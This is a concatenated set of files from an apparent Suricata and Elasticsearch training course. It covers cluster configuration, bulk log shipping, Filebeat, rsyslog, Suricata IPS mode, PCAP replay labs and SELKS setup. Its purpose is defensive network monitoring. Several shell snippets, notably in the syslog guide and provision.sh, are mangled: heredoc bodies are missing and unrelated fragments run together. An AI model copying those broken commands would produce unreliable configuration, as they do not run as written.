73 | Once done, verify no traffic is seen anymore with this IP address. 74 | 75 | One can use `suricatasc` to get interface statistics and/or analyze eve.json output 76 | for significative events. 77 | 78 | ### Invert the logic 79 | 80 | Update `filter.c` to get a pass list instead of a block list. Test it by checking traffic really 81 | start when IP are added. 82 | 83 | ### Add some more logic 84 | 85 | Update `filter.c` to only accept traffic on the port 22 for the IP addresses in the pass list. 86 | 87 | --- 88 | 89 | [back](/Suricata) 90 | -------------------------------------------------------------------------------- /Suricata/elastic-cluster/README.md: -------------------------------------------------------------------------------- 1 | # Clustered elasticsearch 2 | 3 | Elastic config options are in `elasticsearch.yml`. It should be placed under `/etc/elasticsearch` if installed from deb or bound under `/usr/share/elasticsearch/config/elasticsearch.yml` if running from docker images. Also, make sure that each node is bound to distinct port on host if running from container. 4 | 5 | ``` 6 | touch $PWD/elasticsearch.yml 7 | docker run \ 8 | -ti \ 9 | --rm \ 10 | -p 9200:9200 \ 11 | -p 9300:9300 \ 12 | -v $PWD/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml \ 13 | -e "ES_JAVA_OPTS=-Xms512m -Xmx512m" \ 14 | docker.elastic.co/elasticsearch/elasticsearch-oss:7.6.0 15 | ``` 16 | 17 | Firstly, all nodes should be configured to belong to common cluster. 18 | 19 | ``` 20 | cluster.name: josephine 21 | ``` 22 | 23 | Alternatively, any supported elastic config option can be passed to the VM via config variable. 24 | 25 | ``` 26 | docker run \ 27 | -ti \ 28 | --rm \ 29 | -p 9200:9200 \ 30 | -p 9300:9300 \ 31 | -e "ES_JAVA_OPTS=-Xms512m -Xmx512m" \ 32 | -e "cluster.name=josephine" \ 33 | docker.elastic.co/elasticsearch/elasticsearch-oss:7.6.0 34 | ``` 35 | 36 | Each node can be configured for a variety of roles. Single node can fulfill many roles, though specialized workers are common in production. 37 | * `master` is responsible for coordinating other cluster nodes, or be in in standby mode in case main master fails; 38 | * `data` nodes store data on disk and function as indexing and search workers; 39 | * `ingest` nodes run pipeline jobs before indexing the data, and essentially function as logstash integrated into elastic; 40 | 41 | ``` 42 | node: 43 | name: firstnode 44 | data: false 45 | ingest: false 46 | master: false 47 | ``` 48 | 49 | Note that node name is arbitrary and simply has to be unique. It will be automatically generated if left unconfigured. There is another role that is not classified as such. Elastic uses binary connection for intra-cluster communication and HTTP for talking to the world. A common practice is to create specialized *no-data* or *proxy* nodes that are configured with all roles disabled and http enabled. Role of these nodes is simply to collect JSON bulks and to forward it to worker nodes over binary. Workers usually have http disabled or simply bound to localhost. **Please flush your container or data directory if you change node name. Otherwise artifacts from last run may conflict with new config.** 50 | 51 | Binding elastic to specific interfaces can be a good idea if your box has multiple interfaces. Elasic is not terribly intelligent at picking the right interface automatically, and it can cause confusion. 52 | 53 | ``` 54 | network: 55 | host: 0.0.0.0 56 | ``` 57 | 58 | Docker nodes are located inside a docker private network, thus you need to use either a `--network host` flag when creating a container. This binds continer to host network stack and bypasses docker networking entirely. Do not do in production. Or you can alter the `network.publish_host` parameter from elasticsearch. 59 | 60 | ``` 61 | network: 62 | host: 0.0.0.0 63 | publish_host: ACCESSIBLE_IP_OR_ADDRESS 64 | ``` 65 | 66 | HTTP listener can be configured separately. 67 | 68 | ``` 69 | http: 70 | host: 0.0.0.0 71 | ``` 72 | 73 | Older elastic version (before 7) simply required **some master-eligible** nodes to be listied for unicast ping. Nodes would then autonegotiate cluster settings after this ping is successful. 74 | 75 | ``` 76 | discovery: 77 | zen: 78 | ping: 79 | unicast: 80 | hosts: 81 | - 192.168.56.120 82 | - 192.168.56.82 83 | - 192.168.56.122 84 | ``` 85 | 86 | [Version 7 changed the syntax and added more fine-graining options.](https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-discovery-hosts-providers.html) New syntax is `discovery.seed_hosts`. Note that port suffix corresponds to **binary transport** port, which defaults to `9300` (but can be changed). 87 | 88 | ``` 89 | discovery.seed_hosts: 90 | - 192.168.56.120:9300 91 | - 192.168.56.11 92 | ``` 93 | 94 | Furthermore, we now need to define an initial list of **master-eligible nodes** when bootstrapping a new cluster. Otherwise, you will be greeted by an error like this - 95 | 96 | ``` 97 | "message": "master not discovered yet, this node has not previously joined a bootstrapped (v7+) cluster, and [cluster.initial_master_nodes] is empty on this node 98 | ``` 99 | 100 | To fix this, you need a list of potential master **node names** (not network addresses) in configuration. In other words, names in this list must correspond to `node.name` value for each listed master node. 101 | 102 | ``` 103 | cluster.initial_master_nodes: 104 | - firstnode 105 | - secondnode 106 | ``` 107 | 108 | Then verify that nodes are listed with proper roles via `_cat` API. 109 | 110 | ``` 111 | curl PROXY:PORT/_cat/nodes 112 | ``` 113 | 114 | ## Shard allocation and cluster API 115 | 116 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/shard-allocation-filtering.html 117 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/disk-allocator.html 118 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/cluster-update-settings.html 119 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/shards-allocation.html 120 | * https://gist.github.com/markuskont/734a9ec946bf40801494f14b368a0668 121 | 122 | Suppose our elastic cluster is distributed across multiple racks or datacenters. We can define custom attributes for each node. For example, we could configure `node.attr.datacenter: $NAME` or `node.attr.rack_id: $NAME`. Note that both `datacenter` and `rack_id` are totally custom attributes added by us. We could also create attribute `purpose` with values `hot`, `cold`, `archive`, and configure all new indices to be created on `hot` nodes. 123 | 124 | Then we can make our cluster aware of those settings (**only needs to be done once per cluster**). 125 | 126 | ``` 127 | curl -XPUT -ss -H'Content-Type: application/json' "localhost:9200/_cluster/settings" -d '{ 128 | "transient" : { 129 | "cluster.routing.allocation.awareness.attributes": "datacenter" 130 | } 131 | }' 132 | ``` 133 | 134 | Once done, our replicas should then be distributed over datacenters. 135 | -------------------------------------------------------------------------------- /Suricata/elastic-log-shipping/000-bulk-intro.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "Install requried modules with `pip`.\n", 8 | "\n", 9 | "```\n", 10 | "python3 -m pip install --user --upgrade elasticsearch\n", 11 | "```" 12 | ] 13 | }, 14 | { 15 | "cell_type": "code", 16 | "execution_count": 1, 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "from elasticsearch import Elasticsearch" 21 | ] 22 | }, 23 | { 24 | "cell_type": "markdown", 25 | "metadata": {}, 26 | "source": [ 27 | "Connect to local instance" 28 | ] 29 | }, 30 | { 31 | "cell_type": "code", 32 | "execution_count": 2, 33 | "metadata": {}, 34 | "outputs": [], 35 | "source": [ 36 | "conn = Elasticsearch(hosts=[\"localhost:9200\"])" 37 | ] 38 | }, 39 | { 40 | "cell_type": "markdown", 41 | "metadata": {}, 42 | "source": [ 43 | "Object creation does not verify that server is up. Validate it!" 44 | ] 45 | }, 46 | { 47 | "cell_type": "code", 48 | "execution_count": 3, 49 | "metadata": {}, 50 | "outputs": [ 51 | { 52 | "data": { 53 | "text/plain": [ 54 | "True" 55 | ] 56 | }, 57 | "execution_count": 3, 58 | "metadata": {}, 59 | "output_type": "execute_result" 60 | } 61 | ], 62 | "source": [ 63 | "conn.ping()" 64 | ] 65 | }, 66 | { 67 | "cell_type": "markdown", 68 | "metadata": {}, 69 | "source": [ 70 | "Elasticsearch uses HTTP and transport protocol, so indexing individual documents is fairly expensive. Especially when talking about IDS logs. Proper way is to use bulk API.\n", 71 | "\n", 72 | "See:\n", 73 | "\n", 74 | "https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-bulk.html\n", 75 | "\n", 76 | "Bulk format requires metadata line before each document to indicate what action should be taken, which index used, etc. **Index name must be lowercase**." 77 | ] 78 | }, 79 | { 80 | "cell_type": "code", 81 | "execution_count": 4, 82 | "metadata": {}, 83 | "outputs": [], 84 | "source": [ 85 | "bulk = []\n", 86 | "i = 0\n", 87 | "for i in range(100):\n", 88 | " meta = {\n", 89 | " \"index\": {\n", 90 | " \"_index\": \"mynewindex\",\n", 91 | " \"_id\": i\n", 92 | " }\n", 93 | " }\n", 94 | " doc = {\n", 95 | " \"message\": \"this is message {}\".format(i),\n", 96 | " \"count\": i\n", 97 | " }\n", 98 | " \n", 99 | " bulk.append(meta)\n", 100 | " bulk.append(doc)" 101 | ] 102 | }, 103 | { 104 | "cell_type": "code", 105 | "execution_count": 5, 106 | "metadata": {}, 107 | "outputs": [ 108 | { 109 | "name": "stdout", 110 | "output_type": "stream", 111 | "text": [ 112 | "200\n" 113 | ] 114 | } 115 | ], 116 | "source": [ 117 | "print(len(bulk))" 118 | ] 119 | }, 120 | { 121 | "cell_type": "markdown", 122 | "metadata": {}, 123 | "source": [ 124 | "Then ship it!" 125 | ] 126 | }, 127 | { 128 | "cell_type": "code", 129 | "execution_count": 6, 130 | "metadata": {}, 131 | "outputs": [ 132 | { 133 | "name": "stdout", 134 | "output_type": "stream", 135 | "text": [ 136 | "dict_keys(['took', 'errors', 'items'])\n" 137 | ] 138 | } 139 | ], 140 | "source": [ 141 | "resp = conn.bulk(bulk)\n", 142 | "print(resp.keys())" 143 | ] 144 | }, 145 | { 146 | "cell_type": "markdown", 147 | "metadata": {}, 148 | "source": [ 149 | "And verify on CLI.\n", 150 | "\n", 151 | "```\n", 152 | "curl localhost:9200/myNewIndex/_search\n", 153 | "```" 154 | ] 155 | } 156 | ], 157 | "metadata": { 158 | "kernelspec": { 159 | "display_name": "Python 3", 160 | "language": "python", 161 | "name": "python3" 162 | }, 163 | "language_info": { 164 | "codemirror_mode": { 165 | "name": "ipython", 166 | "version": 3 167 | }, 168 | "file_extension": ".py", 169 | "mimetype": "text/x-python", 170 | "name": "python", 171 | "nbconvert_exporter": "python", 172 | "pygments_lexer": "ipython3", 173 | "version": "3.9.1" 174 | } 175 | }, 176 | "nbformat": 4, 177 | "nbformat_minor": 4 178 | } 179 | -------------------------------------------------------------------------------- /Suricata/elastic-log-shipping/README.md: -------------------------------------------------------------------------------- 1 | # Shipping Suricata logs to Elasticsearch 2 | 3 | This section assumes that student is familiar with: 4 | * Suricata on CLI, configuring it, using rulesets and parsing or replaying PCAP files; 5 | * Getting Elastic up and running with docker, interacting with `/_cat` and `_search` API endpoints; 6 | 7 | * https://suricata.readthedocs.io/en/latest/output/eve/eve-json-output.html#output-types 8 | 9 | This section assumes that student can produce EVE JSON messages with Suricata and is familiar with basic Elastic setup. 10 | 11 | * [Previous section](/Suricata/elastic) explained how Elastic works on high level and how to insert documents individually; 12 | * however, this is very inefficient as every EVE message would be a separate HTTP request; 13 | * that's suicide; 14 | * solution - clump a batch of messages and send a single big request; 15 | * Elastic has `_bulk` API endpoint to pick them up; 16 | * 1000 or 10000 elements per bulk is not uncommon; 17 | * Many methods exist to ship EVE into Elastic; 18 | * Up to your setup whatever works for you; 19 | * But, fundamentally, they all interact with `_bulk`; 20 | * So, basic understanding about how it works will be useful if things go wrong; 21 | * (and they most definitely will); 22 | 23 | ## Bulk API 24 | 25 | * [basics](/Suricata/elastic-log-shipping/000-bulk-intro.ipynb) 26 | * [shipping EVE](/Suricata/elastic-log-shipping/000-bulk-eve.ipynb) 27 | 28 | ## Filebeat 29 | 30 | * https://www.elastic.co/downloads/beats/filebeat-oss 31 | 32 | Beats family is a very popular choice for client-side log shipping nowadays. It's a Go binary, so it does not have any external dependencies. Any compatible OS architecture should be able to execute the compiled binary. That's nice, because it also means we don't need containers to keep dependencies in check. Most simple setup is to download the package and run it! 33 | 34 | **Mind the version, it must be the same as Elasticsearch you are already running**. 35 | 36 | ``` 37 | wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-oss-7.10.2-linux-x86_64.tar.gz 38 | tar -xzf filebeat-oss-7.10.2-linux-x86_64.tar.gz 39 | cd filebeat-7.10.2-linux-x86_64/ 40 | ls -lah 41 | ``` 42 | 43 | You should see something like this. 44 | 45 | ``` 46 | total 69M 47 | drwxr-xr-x 5 root root 4.0K Jan 22 10:02 . 48 | drwx------ 6 root root 4.0K Jan 22 10:02 .. 49 | -rw-r--r-- 1 root root 41 Jan 12 22:13 .build_hash.txt 50 | -rw-r--r-- 1 root root 291K Jan 12 22:10 fields.yml 51 | -rwxr-xr-x 1 root root 61M Jan 12 22:12 filebeat 52 | -rw-r--r-- 1 root root 90K Jan 12 22:10 filebeat.reference.yml 53 | -rw------- 1 root root 9.8K Jan 12 22:10 filebeat.yml 54 | drwxr-xr-x 3 root root 4.0K Jan 12 22:10 kibana 55 | -rw-r--r-- 1 root root 12K Jan 12 21:58 LICENSE.txt 56 | drwxr-xr-x 22 root root 4.0K Jan 12 22:10 module 57 | drwxr-xr-x 2 root root 4.0K Jan 12 22:10 modules.d 58 | -rw-r--r-- 1 root root 8.2M Jan 12 22:00 NOTICE.txt 59 | -rw-r--r-- 1 root root 814 Jan 12 22:13 README.md 60 | ``` 61 | 62 | And then explore the built-in help dialog for filebeat. 63 | 64 | ``` 65 | ./filebeat --help 66 | ./filebeat run --help 67 | ``` 68 | 69 | Filebeat uses subcommands, as many CLI applications do. Main one being `run`. While you can override config options on command line, a better option is to use `-c` to point it toward a custom config file. Example skeletons are already in the folder, **but they are not enough**. 70 | 71 | Filebeat must be configured to: 72 | * load your EVE JSON file, *where ever you decided to store it*; 73 | * parse each message for JSON data, store that decoded JSON in elastic message root; 74 | * parse message timestamp to get `@timestamp` logstash-style field, many frontend tools assume it to be there and can break silently if it's not; 75 | * output stream should be pointed **toward your elastic instance**; 76 | * choose the index you want to store the data; 77 | 78 | Other options are simply nice improvements and demonstration. For example, redefining template patterns, disabling it if you want, customizing elastic index pattern, helpful filebeat logging, etc. 79 | 80 | ``` 81 | filebeat.inputs: 82 | - type: log 83 | paths: 84 | - "/var/log/suricata/eve.json" 85 | json.keys_under_root: true 86 | json.add_error_key: true 87 | 88 | processors: 89 | - timestamp: 90 | field: timestamp 91 | layouts: 92 | - '2006-01-02T15:04:05.999999Z0700' 93 | - '2006-01-02T15:04:05Z' 94 | - '2006-01-02T15:04:05.999Z' 95 | test: 96 | - '2020-03-12T21:36:17.712650+0200' 97 | - '2019-06-22T16:33:51Z' 98 | - '2019-11-18T04:59:51.123Z' 99 | 100 | output.elasticsearch: 101 | hosts: ["localhost:9200"] 102 | index: "filebeat-%{+yyyy.MM.dd}" 103 | bulk_max_size: 10000 104 | 105 | logging.level: info 106 | logging.to_files: true 107 | logging.files: 108 | path: /var/log/filebeat 109 | name: filebeat 110 | keepfiles: 7 111 | permissions: 0644 112 | 113 | setup.template: 114 | name: 'filebeat' 115 | pattern: 'filebeat-*' 116 | enabled: false 117 | ``` 118 | 119 | **Note that this configuration also disables template management.** It assumes ECS patterns (more on that later) which we are not using. It does not configure dual-mapping that is assumed by many front-end tools, and thus breaks them. Alas, many frontend tools are accustomed to Logstash default configurations and have adopted them as requirements. 120 | 121 | This mapping is in `fields.yml` file that could be customized, or reconfigured. But it's easier to set the template manually. Following command will set a template that is derived from logstash default dual-mapping setup. 122 | 123 | ``` 124 | curl -XPUT localhost:9200/_template/logstash -H 'Content-Type: application/json' -d '{"order": 0, "version": 0, "index_patterns": ["logstash-*", "events-*", "suricata-*", "filebeat-*"], "settings": {"index": {"number_of_shards": 3, "number_of_replicas": 0, "refresh_interval": "5s"}}, "mappings": {"dynamic_templates": [{"message_field": {"path_match": "message", "mapping": {"norms": false, "type": "text"}, "match_mapping_type": "string"}}, {"string_fields": {"mapping": {"norms": false, "type": "text", "fields": {"keyword": {"type": "keyword"}}}, "match_mapping_type": "string", "match": "*"}}], "properties": {"@timestamp": {"type": "date", "format": "strict_date_optional_time||epoch_millis||date_time"}, "@version": {"type": "keyword"}, "ip": {"type": "ip"}}}, "aliases": {}}' 125 | ' 126 | ``` 127 | 128 | Assuming you have this config **customized to your environment** in `config.yml`, use the `run` command. 129 | 130 | ``` 131 | ./filebeat run -c config.yml 132 | ``` 133 | 134 | Assuming you kept the default `filebeat` index pattern and are running local docker Elastic on a VM, then verify that you have logs in elastic. **If not, go back to config bulletpoints and verify that you customized each item correctly**. 135 | 136 | ``` 137 | curl localhost:9200/filebeat-*/_search 138 | ``` 139 | 140 | ### Word about ECS 141 | 142 | Elastic Common Schema tries to address a simple issue - Elastic has no schema. This makes it great for *"let's collect everything and figure out what we need later"* role, but leads to way too many fields that are inconsistent across data sources, too many fields types to manage, mapping collisions, key inconsistencies while doing lookups, and too much JSON verbosity. 143 | 144 | ECS is a taxonomy that tackles those problems by...making more fields. Not much is left of original message structure and a ton of metadata is added as well. That metadata has limited use outside Elastic product stack. 145 | 146 | Filebeat has Suricata plugin for doing that, but this is not maintained by Suricata developers. Our course focuses only on core EVE, as that already has over 1000 possible fields depending on configuration. 147 | 148 | ### Docker setup 149 | 150 | For hipster cred, here's filebeat docker setup. However, doing this overkill for this exercise. 151 | 152 | ``` 153 | docker run -dit --name filebeat -h filebeat -v /var/log/suricata:/var/log/suricata:ro -v /var/log/filebeat:/var/log/filebeat:rw -v /etc/filebeat.yml:/etc/filebeat.yml docker.elastic.co/beats/filebeat-oss:${ELASTIC_VERSION} run -c /etc/filebeat.yml 154 | ``` 155 | -------------------------------------------------------------------------------- /Suricata/elastic-log-shipping/syslog.md: -------------------------------------------------------------------------------- 1 | # Syslog 2 | 3 | ## Common Event Expression 4 | 5 | * https://cee.mitre.org/ 6 | * http://www.rsyslog.com/tag/cee-enhanced/ 7 | 8 | ### Log format 9 | 10 | ``` 11 | Feb 25 11:23:42 suricata suricata[26526]: @cee: {"timestamp":"2015-12-07T19:30:54.863188+0000","flow_id":139635731853600,"pcap_cnt":142,"event_type":"alert","src_ip":"192.168.11.11","src_port":59523,"dest_ip":"192.168.12.12","dest_port":443,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013926,"rev":8,"signature":"ET POLICY HTTP traffic on port 443 (POST)","category":"Potentially Bad Traffic","severity":2}} 12 | ``` 13 | 14 | ### Suricata configuration 15 | 16 | ``` 17 | grep cee -B2 -A3 /etc/suricata/suricata.yaml 18 | ``` 19 | 20 | ## Rsyslog 21 | 22 | * http://www.rsyslog.com/ubuntu-repository/ 23 | * http://www.rsyslog.com/tag/mmjsonparse/ 24 | * http://www.rsyslog.com/doc/mmjsonparse.html 25 | * http://www.rsyslog.com/doc/v8-stable/configuration/modules/omelasticsearch.html 26 | 27 | ``` 28 | apt-cache policy rsyslog 29 | rsyslog: 30 | Installed: 7.4.4-1ubuntu2.6 31 | Candidate: 8.16.0-0adiscon1trusty1 32 | Version table: 33 | 8.16.0-0adiscon1trusty1 0 34 | 500 http://ppa.launchpad.net/adiscon/v8-stable/ubuntu/ trusty/main amd64 Packages 35 | *** 7.4.4-1ubuntu2.6 0 36 | 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 37 | 100 /var/lib/dpkg/status 38 | ``` 39 | 40 | ### Installing missing modules 41 | 42 | ``` 43 | sudo apt-get install rsyslog-mmjsonparse rsyslog-elasticsearch -y 44 | ``` 45 | 46 | ``` 47 | sudo service rsyslog restart 48 | ``` 49 | 50 | ### Verify daemon 51 | 52 | ``` 53 | grep rsyslogd /var/log/syslog 54 | ``` 55 | 56 | ### Client-server 57 | 58 | #### client 59 | 60 | ``` 61 | echo "*.* @192.168.10.20:514" >> /etc/rsyslog.d/udp-client.conf 62 | systemctl restart rsyslogd.service 63 | ``` 64 | 65 | #### server 66 | 67 | ``` 68 | cat > /etc/rsyslog.d/udp-server.conf < `Index Patterns`. This will allow you to use `Discover` and `Visuzalize` tabs. 60 | -------------------------------------------------------------------------------- /Suricata/ips/README.md: -------------------------------------------------------------------------------- 1 | # Suricata as an IPS 2 | 3 | > Maybe it is better to just drop the bad stuff? 4 | 5 | see: 6 | * https://github.com/StamusNetworks/SELKS/wiki/Initial-Setup---Suricata-IPS 7 | * https://home.regit.org/2012/09/new-af_packet-ips-mode-in-suricata/ 8 | * https://github.com/OISF/suricata/commit/662dccd8a5180807e3749842508b80e2e2183051 9 | 10 | ## IPS 11 | Suricata can effectively be used as an IPS. Traditinally, a firewall (e.g., netfilter or ipfw) has been used for achieving this functionality. However, this does not always perform very well. 12 | 13 | 14 | Since 2012, you could also use Suricata to bridge two network interfaces using the AF_PACKET ips mode. All packets received from one interface are sent to the other interface, unless a signature with drop (or reject) keyword does not fire on the packet. 15 | 16 | 17 | The copy-mode variable can take the following values: 18 | 19 | * ips: the drop keyword is honored and matching packets are dropped. 20 | * tap: no drop occurs, Suricata acts as a bridge 21 | 22 | 23 | ### sample conf: 24 | ``` 25 | af-packet: 26 | - interface: eth0 27 | threads: 1 28 | defrag: yes 29 | cluster-type: cluster_flow 30 | cluster-id: 98 31 | copy-mode: ips 32 | copy-iface: eth1 33 | buffer-size: 64535 34 | use-mmap: yes 35 | - interface: eth1 36 | threads: 1 37 | cluster-id: 97 38 | defrag: yes 39 | cluster-type: cluster_flow 40 | copy-mode: ips 41 | copy-iface: eth0 42 | buffer-size: 64535 43 | use-mmap: yes 44 | ``` 45 | 46 | ### Remember 47 | 48 | * This mode is dependent on the zero copy mode of AF_PACKET. You need to set use-mmap to yes on both interfaces; 49 | * MTU on both interfaces have to be equal; 50 | * Set different values of cluster-id on both interfaces to avoid conflict; 51 | * Stream engine must be set into inline mode, that way the engine will keep a session in memory until drop/accept has been decided; 52 | 53 | # virtualbox routed setup 54 | 55 | ## set up static routes on client and server 56 | 57 | * client should be routed to server and vice versa, via the bridge machine 58 | * https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-networkscripts-static-routes 59 | * please disable the first network interface on client machine manually! 60 | 61 | ``` 62 | ip route add default via 192.168.12.254 63 | ip route add 192.168.11.0/24 via 192.168.12.254 dev 64 | ``` 65 | ``` 66 | ip route show 67 | ``` 68 | 69 | ## set up suricata ips on bridge machine 70 | 71 | * [suricata will handle packet copy between interfaces, no iptables nor ip_forward setup is needed](/Suricata/suricata/ips-intro.md) 72 | 73 | ### use tcpdump on bridge machine to debug 74 | ``` 75 | vagrant ssh bridge 76 | tcpdump -i enpXXX port 80 77 | ``` 78 | -------------------------------------------------------------------------------- /Suricata/ips/exercises.md: -------------------------------------------------------------------------------- 1 | # create suricata drop rules 2 | 3 | * Drop DNS queries for facebook 4 | * Drop HTTP traffic on non-standard ports (e.g., HTTP on port 53) 5 | * Use test examples below, drop only initial GET response from `home_net -> external` 6 | * Drop all HTTP GET requests directed at `detectportal.firefox.com` 7 | 8 | ## tips for testing 9 | 10 | ### use docker containers on host 11 | 12 | ``` 13 | docker run --rm -i --name apache-on-dns-port -p 53:80 -v "$PWD":/usr/local/apache2/htdocs/ httpd 14 | sudo docker run --rm -ti -p 53:53/tcp -p 53:53/udp --cap-add=NET_ADMIN andyshinn/dnsmasq 15 | ``` 16 | 17 | ### then test from client box 18 | 19 | ``` 20 | curl 192.168.10.1:53 21 | dig A facebook.com @192.168.10.1 -p 53 22 | ``` 23 | -------------------------------------------------------------------------------- /Suricata/live/README.md: -------------------------------------------------------------------------------- 1 | # Live capture 2 | 3 | Reading static PCAPs on disk is nice for testing or forensics, but goal is to run Suricata online. To see bad stuff as soon as it happens. 4 | 5 | ## AF-packet 6 | 7 | On Linux, Suricata uses a kernel interface called `af-packet` to inspect packets without much overhead. On BSD `netmap` fills the same role. 8 | 9 | Note that superuser privileges are needed for writing to interface. 10 | 11 | ``` 12 | sudo suricata --af-packet=$INTERFACE -l logs/ 13 | tail -f logs/eve.json 14 | ``` 15 | 16 | ## Replay 17 | 18 | We can use `tcpreplay` to simulate online environment. Packets can be read from offline PCAP files and written to NIC-s. 19 | 20 | ``` 21 | sudo tcpreplay -i $INTERFACE $PCAP 22 | ``` 23 | 24 | You can also control many aspects of replay. For example, to replay with specific rate, or to loop the replay. 25 | 26 | ``` 27 | sudo tcpreplay --pps=100 --loop=3 -i $INTERFACE $PCAP 28 | ``` 29 | 30 | For exercise or lab setup, you can create a *virtual nic pair* that simulates capture interface. Packets written to one interface can be read from another, just like mirror ports in real life. 31 | 32 | ``` 33 | ip link add capture0 type veth peer name replay0 34 | ``` 35 | 36 | Don't forget to active both endpoints. 37 | 38 | ``` 39 | ip link set capture0 up 40 | ip link set replay0 up 41 | ``` 42 | 43 | Sometimes you might run into packet truncation or size mismatch errors. That's because MTU of box that catured the PCAP was likely higher than default 1512. But you can just configure your capture interfaces for jumbo frames. 44 | 45 | ``` 46 | ip link set dev capture0 mtu 9000 47 | ip link set dev replay0 mtu 9000 48 | ``` 49 | 50 | Packet sizes can vary. Smaller will pass as-is, the MTU config is mainly to ensure that jumbo packets are not truncated. 51 | 52 | Then start the replay. 53 | 54 | ``` 55 | sudo tcpreplay -i replay0 $PCAP 56 | ``` 57 | 58 | `tcpdump` can be used to verify raw packets. 59 | 60 | ``` 61 | sudo tcpdump -n -i capture0 62 | ``` 63 | 64 | Then start Suricata listener 65 | 66 | ``` 67 | sudo suricata --af-packet=capture0 -l logs/ 68 | tail -f logs/eve.json 69 | ``` 70 | 71 | ### Dummy NIC 72 | 73 | Same can be achieved with a single dummy NIC. 74 | 75 | ``` 76 | ip link add tppdummy0 type dummy 77 | ip link set tppdummy0 up 78 | ip link set dev tppdummy0 mtu 9000 79 | ``` 80 | 81 | ## Tasks 82 | 83 | * Select 3 malware PCAP samples; 84 | * Create a virtual NIC pair for each pcap; 85 | * Start a separate suricata capture process for each PCAP replay; 86 | -------------------------------------------------------------------------------- /Suricata/lua/provision.sh: -------------------------------------------------------------------------------- 1 | FILE=/etc/sysctl.conf 2 | grep "disable_ipv6" $FILE || cat >> $FILE <> $FILE < /dev/null 2>&1 \ 19 | && apt-get update > /dev/null \ 20 | && apt-get install -y suricata > /dev/null 21 | 22 | systemctl stop suricata.service 23 | systemctl disable suricata.service 24 | 25 | echo "Adding detects for SURICATA" 26 | FILE=/etc/suricata/cdmcs-detect.yaml 27 | grep "CDMCS" $FILE || cat >> $FILE <> $FILE < et-open/combined.rules 33 | ``` 34 | 35 | ## Reloading rules via unix-socket 36 | 37 | Suricata rule database can be updated without system restart, but this requires `unix-command` to be enabled in `suricata.yaml`. Note that this should be enabled by default, so current section does not require user to set it up. 38 | 39 | ``` 40 | unix-command: 41 | enabled: auto 42 | #filename: custom.socket 43 | ``` 44 | 45 | You can use `suricatasc` utility to connect to Unix Socket. **Suricata must be running in online mode**. And use `sudo` as needed. 46 | 47 | ``` 48 | suricatasc 49 | ``` 50 | 51 | If all goes well, then you should see the following help message once connected. More specifically, we are interested in `reload-rules` command. 52 | 53 | ``` 54 | Command list: shutdown, command-list, help, version, uptime, running-mode, capture-mode, conf-get, dump-counters, reload-rules, ruleset-reload-rules, ruleset-reload-nonblocking, ruleset-reload-time, ruleset-stats, ruleset-failed-rules, register-tenant-handler, unregister-tenant-handler, register-tenant, reload-tenant, unregister-tenant, add-hostbit, remove-hostbit, list-hostbit, reopen-log-files, memcap-set, memcap-show, memcap-list, dataset-add, dataset-remove, iface-stat, iface-list, iface-bypassed-stat, ebpf-bypassed-stat, quit 55 | ``` 56 | 57 | Make sure you have read permissions for socket, or just use `sudo` as needed. 58 | 59 | ``` 60 | suricatasc -c "reload-rules" 61 | ``` 62 | 63 | Then add update command with reload to periodic cron task. 64 | 65 | ## Show and tell 66 | 67 | * [See the attached notebook](/Suricata/rulesets/000-explore-rulesets.ipynb) 68 | 69 | Demo session for exploring rulesets with a Jupyter notebook. For showing how rulesets are structured, how many rules there are, how rules are usually written by professionals. Not meant to be a hands-on session for students. 70 | 71 | ``` 72 | python3 -m pip install --user --upgrade jupyter jupyterlab pandas numpy idstools 73 | export PATH="$HOME/.local/bin:$PATH" 74 | ``` 75 | -------------------------------------------------------------------------------- /Suricata/selks/README.md: -------------------------------------------------------------------------------- 1 | # SELKS 2 | 3 | ## On docker 4 | 5 | Simply clone the SELKS public repository. 6 | 7 | ``` 8 | git clone https://github.com/StamusNetworks/SELKS.git 9 | ``` 10 | 11 | Enter the docker folder. 12 | 13 | ``` 14 | cd SELKS/docker 15 | ``` 16 | 17 | Use `easy-setup.sh` script to prepare docker environment. It will prompt with a number of questions, including. Install what is needed. 18 | 19 | ``` 20 | sudo ./easy-setup.sh --es-memory 1G --ls-memory 1G 21 | ``` 22 | 23 | Note that this command limits Elasticsearch and Logstash memory to 1GB RAM. 24 | 25 | At the end of this run you will have: 26 | * docker installation; 27 | * docker-compose; 28 | * portainer for managing docker containers (if enabled); 29 | * prepared data for containers; 30 | * af-packet interface capture config for suricata; 31 | * environment setup for Elastic and Logstash memory caps; 32 | 33 | Alternatively, script can also be executed non-interactively with most options passed via command line. Make sure that interface `-i` matches something that exists on your system. 34 | 35 | ``` 36 | sudo ./easy-setup.sh --non-interactive -i tppdummy0 --iA --es-memory 1G --ls-memory 1G 37 | ``` 38 | 39 | Refer to live capture section on for how to set up a virtuan NIC for replays. 40 | 41 | Once setup is done, spin up containers with docker-compose. 42 | 43 | ``` 44 | sudo docker-compose up -d 45 | ``` 46 | 47 | To see the logs either omit the `-d` to call it in foreground or see the backend logs. 48 | 49 | ``` 50 | sudo docker-compose logs --follow 51 | ``` 52 | 53 | Once done, navigate to `https://192.168.56.13/` if using embedded vagrant env. Otherwise visit port 443 on whatever box was used. Default credentials are `selks-user:selks-user`. 54 | 55 | ## Reading PCAPs 56 | 57 | `SELKS/docker/scripts` folder has a helper for reading PCAP files. 58 | 59 | ``` 60 | ./scripts/readpcap.sh -h 61 | Pcap reading script through Suricata 62 | Usage: ./scripts/readpcap.sh [-c|--(no-)cleanup] [-a|--(no-)autofp] [-s|--set-rulefile ] [-S|--set-rulefile-exclusive ] [-h|--help] [--] 63 | : Path to the pcap file to read. If specifies a directory, all files in that directory 64 | will be processed in order of modified time maintaining flow state between files. 65 | -c, --cleanup, --no-cleanup: 